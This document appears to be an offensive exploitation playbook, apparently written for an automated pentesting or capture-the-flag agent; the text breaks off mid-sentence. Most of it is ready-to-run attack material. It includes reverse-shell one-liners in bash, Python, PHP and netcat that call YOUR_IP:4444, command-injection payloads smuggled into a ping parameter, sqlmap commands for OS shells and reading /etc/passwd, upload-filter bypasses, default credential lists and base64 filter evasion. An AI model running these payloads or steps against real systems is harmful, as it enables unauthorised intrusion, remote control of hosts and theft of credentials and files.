Exploitation Knowledge Base
Purpose
This knowledge base provides comprehensive exploitation methodologies and techniques. It covers converting discovered vulnerabilities into actual access, finding and adapting exploits, working in non-interactive environments, establishing stable shells, and capturing the user flag.
Core Topics Covered
- Exploit Discovery: Finding relevant exploits for discovered services
- Exploit Adaptation: Modifying exploits to work in the target environment
- Initial Access: Gaining command execution or shell access
- Shell Stabilization: Upgrading to stable, usable shells
- User Flag Capture: Locating and reading user.txt
Tools Available
Exploit Databases
searchsploit- Local exploit-db searchmsfconsole- Metasploit framework- Manual search: ExploitDB, GitHub, security advisories
Shell Tools
- Reverse shells: bash, python, php, nc
- Web shells: PHP, ASP, JSP
rlwrap nc- Stabilize shells
Web Exploitation
sqlmap- SQL injectioncurl- Manual web testing- File upload bypass techniques
- Command injection testing
Credential Testing
hydra- Service brute force (limited use)ssh/ftp/mysql- Test discovered credentials
Exploitation Workflow
Phase 1: Multi-Source Exploit Discovery
Core Principle: Use multiple exploit sources in parallel - never rely on a single source.
Layered Exploit Search:
# Layer 1: Local database (fastest)
searchsploit "service version"
searchsploit CVE-YYYY-XXXXX
# If found → proceed to analysis
# If not found → immediately try Layer 2
# Layer 2: Metasploit framework
msfconsole -q -x "search type:exploit name:service_name; exit"
# If found → test with msfconsole
# If not found → immediately try Layer 3
# Layer 3: Online sources (GitHub, Google)
# GitHub API search (automated)
curl -s "https://api.github.com/search/repositories?q=CVE-YYYY-XXXXX+exploit" | jq -r '.items[].html_url'
# Google search (manual if needed)
# Search: "CVE-YYYY-XXXXX exploit poc github"
# Search: "service_name version exploit"
# Layer 4: Adapt or create custom exploit
# Based on vulnerability description/advisory
# Modify existing PoC for your environment
Critical Rules:
- Try all layers - Don't stop at Layer 1 failure
- Parallel search - If time allows, search multiple sources simultaneously
- Cross-validate - If multiple exploits exist, try most reliable/recent first
- Track sources - Record which source worked in
successful_paths
Phase 2: Exploit Analysis
Before running:
- Read the exploit code - understand what it does
- Check requirements - needed libraries, credentials
- Identify target parameters - IP, port, payload location
- Plan adaptation - what needs to be modified
Phase 3: Exploit Adaptation
Common modifications needed:
A. Python Exploits
# Original (interactive)
import sys
target = sys.argv[1]
shell = raw_input("Enter command: ")
# Adapted (non-interactive)
target = "10.10.10.1"
shell = "/bin/bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'"
B. Metasploit Exploits
# Use non-interactive mode
msfconsole -q -x "use exploit/linux/http/webmin_backdoor; set RHOSTS 10.10.10.1; set LHOST YOUR_IP; run; exit"
C. Reverse Shell Payloads
# Bash reverse shell
bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'
# Python reverse shell
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("YOUR_IP",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/bash","-i"])'
# PHP reverse shell (for uploads)
<?php system("bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'"); ?>
# NC reverse shell
nc YOUR_IP 4444 -e /bin/bash
# Or if -e not available:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc YOUR_IP 4444 >/tmp/f
Phase 4: Listener Setup
Always start listener before triggering exploit:
# Simple listener
nc -lvnp 4444
# Stabilized listener with rlwrap
rlwrap nc -lvnp 4444
Phase 5: Execution
Execute exploit and verify success:
# Run exploit
python3 exploit.py
# If successful, you should see connection in listener
# Test with:
id
whoami
pwd
Phase 6: Shell Stabilization
Once you have basic shell:
# Upgrade to TTY shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
# Then press Ctrl+Z
stty raw -echo; fg
export TERM=xterm
Common Attack Vectors
1. File Upload Vulnerabilities
# Test simple upload
curl -F "file=@shell.php" http://TARGET/upload.php
# Bypass restrictions
# Try: shell.php.jpg, shell.phtml, shell.php5, shell.PhP
# Find uploaded file
gobuster dir -u http://TARGET/uploads -x php,phtml
# Trigger shell
curl http://TARGET/uploads/shell.php?cmd=id
2. SQL Injection
# Test for SQLi
sqlmap -u "http://TARGET/page.php?id=1" --batch --level=5 --risk=3
# If found, try to get shell
sqlmap -u "http://TARGET/page.php?id=1" --os-shell
# Or read files
sqlmap -u "http://TARGET/page.php?id=1" --file-read=/etc/passwd
3. Command Injection
# Test common injection points
curl "http://TARGET/ping.php?ip=127.0.0.1;id"
curl "http://TARGET/ping.php?ip=127.0.0.1|whoami"
curl "http://TARGET/ping.php?ip=127.0.0.1`whoami`"
# Get reverse shell
curl "http://TARGET/ping.php?ip=;bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'"
4. Public Exploits
# If you find CVE-2021-XXXX is applicable
# Search for PoC
searchsploit CVE-2021-XXXX
# Or check GitHub
curl -s "https://api.github.com/search/repositories?q=CVE-2021-XXXX" | jq -r '.items[].html_url'
# Download and adapt
wget https://raw.githubusercontent.com/user/repo/exploit.py
# Modify target IP, ports, payload
# Run
python3 exploit.py
5. Default Credentials
Test these FIRST before complex exploits:
# SSH
ssh admin@TARGET # Try: admin/admin, root/root, root/toor
# FTP
ftp TARGET # Try: anonymous/anonymous, admin/admin
# MySQL
mysql -h TARGET -u root -p # Try: root/'', root/root
# Web Admin Panels
# Try: admin/admin, admin/password, admin/admin123
Environment Detection and Payload Adaptation
Core Principle: Always probe environment before choosing exploitation method.
Pre-Exploitation Environment Check
Check your attacking machine:
# Check critical tools and versions
java -version 2>&1 | head -1 # For JNDI, deserialization exploits
python3 --version # For exploit scripts
gcc --version # For compiling exploits
which nc netcat ncat # For reverse shells
# Record environment limitations
# Example: If Java > 8, JNDI injection will be blocked
# Example: If no gcc, can't compile C exploits → need precompiled or script-based
Check target environment (after gaining RCE):
# Via webshell or command injection, test what's available:
which nc python python3 php perl bash sh curl wget
# Test specific versions if exploit requires them
python --version
php --version
# Check writable directories
ls -la /tmp /dev/shm /var/tmp
# Check for filtering/WAF
# Try: echo test
# Try: cat /etc/passwd
# If blocked, try base64 encoding or other bypass
Adaptive Payload Selection
Decision Tree for Reverse Shells:
1. Do we have RCE?
└─ Yes → Proceed to step 2
└─ No → Get RCE first (file upload, SQLi, etc.)
2. Check target environment
└─ nc available? → Use nc reverse shell
└─ python available? → Use python reverse shell
└─ php available? (web server) → Use PHP reverse shell
└─ bash available? → Use bash /dev/tcp method
└─ None? → Upload binary or use alternative method
3. Test for filtering
└─ Try basic command: echo test
└─ If special chars blocked (/, &, >, |) → Use encoding:
- Base64: echo BASE64 | base64 -d | bash
- Hex encoding
- URL encoding
└─ If commands filtered by keyword → Try alternat